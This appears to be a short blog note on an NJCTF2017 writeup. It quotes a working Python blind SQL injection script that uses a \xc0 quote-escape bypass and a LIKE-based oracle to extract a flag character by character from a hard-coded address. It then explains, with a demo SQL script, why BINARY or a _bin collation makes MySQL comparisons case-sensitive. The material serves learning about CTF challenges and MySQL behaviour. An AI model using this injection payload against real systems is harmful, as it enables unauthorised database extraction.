binary in MySQL
While reading a writeup for NJCTF2017 I came across this script:
```python
# Python 2 (urllib.quote, str.encode("hex"), print statement).
import requests
from urllib import quote

url = "http://218.2.197.235:23733/index.php?key="
# binary(flag) makes the LIKE comparison case-sensitive; without it MySQL's
# default collation would also accept a guess in the wrong case.
payload = "\xc0'||(select(binary(flag))from(flag))like(0x%s)#"


def check(prefix):
    # Send the hex-encoded prefix guess; '002265' in the body marks a true response.
    u = url + quote(payload % (prefix.encode("hex")))
    ret = requests.get(u).content
    return '002265' in ret


ans = ""
# Candidate characters, tried in order. Note that '_' and '%' are LIKE wildcards
# and therefore always match once they are reached.
s = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"$\'()*+,-./:;<=>?@[\\]^`{|}~\'"_%'

if __name__ == "__main__":
    while True:
        print ans
        for i in s:
            # Extend the known prefix by one character at a time.
            if check(ans + i + '%'):
                ans += i
                break
```
Note the payload here: payload = "\xc0'||(select(binary(flag))from(flag))like(0x%s)#"
It contains a binary(flag). After looking it up I learned that MySQL string comparison is case-insensitive by default, so binary has to be added to make the comparison case-sensitive.
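The MySQL behaviour described above, as an added example that is not part of the writeup or the original note: the table, collation and values are constructed for illustration, and it also shows the COLLATE alternative to BINARY.

```sql
-- Added example (not from the writeup). Shows that under MySQL's default
-- *_ci collation, = and LIKE ignore letter case, and how BINARY or a _bin
-- collation forces a byte-for-byte comparison. Table and data are constructed.
CREATE TABLE demo_flag (
    flag VARCHAR(64) NOT NULL      -- inherits the table's *_ci collation below
) CHARACTER SET utf8mb4 COLLATE utf8mb4_general_ci;

INSERT INTO demo_flag (flag) VALUES ('FlAg{MiXeD_cAsE}');

-- 1. Case-insensitive collation: both of these compare without regard to case,
--    so a lowercase pattern is treated the same as the mixed-case value.
SELECT flag FROM demo_flag WHERE flag LIKE 'flag{mixed%';
SELECT flag FROM demo_flag WHERE flag = 'flag{mixed_case}';

-- 2. BINARY casts the column to a binary string, so LIKE and = now compare
--    the raw bytes and letter case is significant.
SELECT flag FROM demo_flag WHERE BINARY flag LIKE 'flag{mixed%';
SELECT flag FROM demo_flag WHERE BINARY flag LIKE 'FlAg{MiXeD%';
-- Same effect with an explicit cast (preferred in newer MySQL releases).
SELECT flag FROM demo_flag WHERE CAST(flag AS BINARY) = 'flag{mixed_case}';

-- 3. Per-query alternative: switch the collation instead of the type.
SELECT flag FROM demo_flag WHERE flag COLLATE utf8mb4_bin = 'flag{mixed_case}';

-- 4. For columns where case matters (tokens, secrets, identifiers that must be
--    distinct by case), store them with a _bin collation so every comparison,
--    including UNIQUE constraints, is case-sensitive without remembering BINARY.
ALTER TABLE demo_flag MODIFY flag VARCHAR(64) COLLATE utf8mb4_bin NOT NULL;
SELECT flag FROM demo_flag WHERE flag = 'flag{mixed_case}';

-- Collation comparison side by side, independent of any table.
SELECT 'abc' = 'ABC' AS ci_compare, BINARY 'abc' = 'ABC' AS binary_compare;
```

Run the statements in order: queries under step 1 return the row, those under steps 2 to 4 with a lowercase literal do not, and the final SELECT contrasts the two comparison modes in one result.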